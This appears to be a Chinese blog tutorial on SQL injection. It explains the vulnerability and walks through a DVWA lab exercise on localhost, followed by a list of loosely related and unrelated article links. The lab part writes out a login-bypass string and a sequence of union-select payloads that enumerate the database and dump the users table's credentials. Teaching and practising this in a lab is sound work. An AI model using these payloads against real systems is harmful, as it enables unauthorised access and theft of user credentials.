SQL 注入漏洞

一.什么是注入漏洞

    注入(SQLi)是一种注入攻击,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。SQL注入漏洞可能会影响使用SQL数据库(如MySQL,Oracle,SQL Server或其他)的任何网站或Web应用程序。犯罪分子可能会利用它来未经授权访问用户的敏感数据:客户信息,个人数据,商业机密,知识产权等。SQL注入攻击是最古老,最流行,最危险的Web应用程序漏洞之一。

二.SQL注入漏洞的原理

一般用户登录用的SQL语句为:SELECT * FROM user WHERE username=‘admin’ AND password=‘passwd’,此处admin和passwd分别为用户输入的用户名和密码,如果程序员没有对用户输入的用户名和密码做处理,就可以构造万能密码成功绕过登录验证,如用户输入’or 1#,SQL语句将变为:SELECT * FROM user WHERE username=’‘or 1#’ AND password=’’,‘’or 1为TRUE,#注释掉后面的内容,所以查询语句可以正确执行。我们可以使用DVWA来测试一下。在原有sql语句中插入构造的语句,返回我们需要的数据

三.实验过程

1. 搭建环境

1. 重启php ,并打开登录信息

2. 下载dvwa

1. 下载放在WWW的目录下,并用记事本打开config 修改用户名和密码为root

2.打开小狐狸访问127.0.0.1/dvwa

把安全性设置成最低的——low

3. SQL注入点,简单判断方法。

1’ 、 " 、) 、 ')、 ") 是否报错

4. 1 and 1=1 1 and 1=2 判断返回是否有差异


5. 1 or 1=1 1 or 1=2 判断返回是否有差异


6. 判断可显示数据的位置

1’ union select 1,2 #

7. 判断数据库名、数据库版本、用户名

1’ union select version(),user() #

8. 获取表名

1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘dvwa’# (guestbook,users)

9. 获取列名

1’ union select 1, group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=database()#

10. 获取数据——成功

1’ union select user,password from users#

SQL注入漏洞 攻击相关推荐

  1. 【转】基于SQL的Web系统安全防范——SQL注入漏洞

    攻击研究及防范措施 SQL-Based Web System Security--Structured Query Language InjectionLeak Attack Study And De ...

  2. sql注入漏洞,应屏蔽SQL注入攻击

    2019独角兽企业重金招聘Python工程师标准>>> 注:SQL注入好比是前端URL传参数请求时参数以SQL 做为参数传入,如 select 1  from dual where ...

  3. SQL注入漏洞的攻击与防御

    一.实验名称 SQL注入漏洞的攻击与防御 二.实验环境(详细说明运行的系统.平台及代码等) 1.攻击机系统环境:Windows 7/8/10 2.浏览器:Firefox 53.0.2(64位) 3.浏 ...

  4. SQL 注入漏洞(十四)xff 注入攻击

    一.xff 注入攻击 X-Forwarded-For 简称 XFF 头,它代表了客户端的真实 IP,通过修改他的值就可以伪造客户端 IP.XFF 并不受 gpc 影响,而且开发 人员很容易忽略这个 X ...

  5. php post防止hash攻击,MyBB editpost.php脚本'posthash' 参数SQL注入漏洞

    发布日期:2012-12-14 更新日期:2012-12-18 受影响系统: MyBB MyBB 1.x 描述: ------------------------------------------- ...

  6. guestbook.php注入,TinyGuestBook 'sign.php'多个SQL注入漏洞

    发布日期:2012-09-23 更新日期:2012-10-04 受影响系统: TinyGuestBook TinyGuestBook 描述: ----------------------------- ...

  7. WEB安全:XSS漏洞与SQL注入漏洞介绍及解决方案

    对web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,希望大家多多提意见. 对于防止sql注入发生,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避 ...

  8. wordpress漏洞_多个WordPress插件SQL注入漏洞分析

    背景 SQL注入漏洞是用来构建SQL查询的用户输入未经适当处理导致的漏洞.比如: 图1: 使用WordPress的SQL查询示例 从上面的代码来看,其中存在SQL注入攻击漏洞,因为从$_GET中提取的 ...

  9. php网站漏洞检测对sql注入漏洞防护

    近日,我们SINE安全对metinfo进行网站安全检测发现,metinfo米拓建站系统存在高危的sql注入漏洞,攻击者可以利用该漏洞对网站的代码进行sql注入攻击,伪造恶意的sql非法语句,对网站的数 ...

  10. Zabbix SQL注入漏洞威胁预警通告

    Zabbix软件被爆存在SQL注入漏洞,攻击者无需登录即可通过script等功能直接获取服务器的操作系统权限,经过分析发现Zabbix默认开启了guest权限,且默认密码为空.为了帮助广大用户尽快关注 ...

最新文章

  1. pandas使用extract函数根据正则表达式从dataframe指定数据列的字符串中抽取出数字并生成新的数据列(extract numbers from column)
  2. linux入门(二)
  3. 5 hbase-shell + hbase的java api
  4. attr和prop的区别
  5. bootstrap兼容ie8以下版本
  6. erp生产管理系统排名_仁和ERP软件企业管理系统如何提高生产管理
  7. Tomcat的部署+第一个Servlet
  8. postgre ~模糊查询慢解决方式
  9. python随机抽奖程序代码_详解用python写一个抽奖程序
  10. Tomcat的设计模式
  11. mysql主从复制(master 、salve)
  12. 统信UOS安装flash浏览器插件
  13. AI笔刷 600+专业ai矢量笔刷套装(含安装教程)
  14. THREE实战2_正交投影相机与透视相机
  15. css 小尖角,css如何实现气泡的小尖角效果 css实现气泡的小尖角效果代码示例
  16. Gym 101669J SEERC 2017 Cunning Friends
  17. 2023年北京师范大学应用统计考研上岸前辈备考经验指导
  18. 起因:想要用visio画框图
  19. ArcGIS批量修改CASS标注 | 小技巧,高效率
  20. 基于微信小程序云开发(校园许愿墙app)妄想替代学校的表白墙

热门文章

  1. 关于变量声明的var,let,const
  2. 16年4月20号 个人总结
  3. Visual Studio中的项目属性--生成--配置
  4. FPGA BCD计数器(多位)
  5. 慕课java工程师2020版_2020年Java工程师就业前景怎么样?
  6. simple php手册,PHP中SimpleXML函数简介
  7. Qt TextEdit 不自动换行 取消换行
  8. 摄像头(WebCam)在Linux操作系统中的驱动方法
  9. oracle trunc delete 有什么区别,oracle的trunc与round区别及处理日期和数值的区别
  10. C# 文件上传 默认最大为4M的解决方法